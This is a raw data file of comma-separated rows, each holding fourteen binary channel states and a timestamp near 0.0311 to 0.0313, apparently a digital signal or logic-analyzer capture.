0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132184e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132188e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132408e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132412e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132436e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132460e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132508e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132556e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132584e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132608e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132636e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132684e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132688e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132708e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132732e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132756e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132784e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1132808e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1132836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132840e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1132956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1132984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133008e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133012e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133060e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133092e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133132e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133156e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133184e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133208e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133236e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133260e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133292e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133308e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133332e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133340e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133384e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133408e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133436e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133468e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133608e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133612e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133660e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133692e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133708e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133732e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133740e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1133784e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133808e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133816e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1133932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1133956e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1133964e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1134012e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1134036e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,3.1134040e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134044e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134084e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134132e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134156e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1134188e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1134236e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1134260e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134388e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134408e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1134416e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1134436e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1134460e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134468e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134808e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1134956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1134984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135408e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135808e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1135956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1135984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136408e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136756e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136784e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136808e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136884e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136932e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1136956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1136984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137008e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137036e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137060e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137084e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137132e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137156e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137184e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137208e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137236e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137260e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137284e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137332e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137384e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137408e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137460e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137484e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137584e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137636e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137660e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137684e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137708e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1137732e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1137756e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1262340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1262556e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,3.1262584e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1262608e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1262900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1262928e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1262932e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,3.1262976e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1263004e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,1,3.1263008e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1263012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1263028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1263052e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1263056e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,3.1263100e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.1263124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.1263132e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,3.1263152e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263172e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263176e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263180e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1263228e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263260e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263300e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263308e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1263352e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263376e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263384e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263576e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263580e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1263628e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263652e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263660e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263700e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263708e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1263752e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263776e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263784e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263804e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263828e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1263952e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1263976e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1263980e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1264028e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264052e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264060e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264100e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264108e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1264152e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264176e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264184e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264204e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264228e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264252e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264276e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264376e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264380e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1264428e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264460e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264476e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264500e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264524e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264552e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264576e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264604e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264628e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264652e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264700e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264752e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264756e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1264804e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264828e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264836e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1264900e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1264924e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1264932e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1264976e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265004e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.1265008e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265052e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265152e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265176e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265204e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265228e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265252e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265256e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1265300e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265324e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265332e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265376e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265524e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265532e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1265576e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265604e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.1265608e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265628e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265652e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265656e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1265700e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265724e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265732e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265776e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265804e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265852e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265876e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1265924e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1265952e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1265956e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1266004e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1266028e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266036e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266076e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266100e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266124e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266152e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266176e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1266204e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.1266252e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.1266276e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266284e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266300e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266324e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266352e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266376e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266428e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266452e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266476e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266500e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266524e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266552e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266576e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.1266604e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.1266628e-02 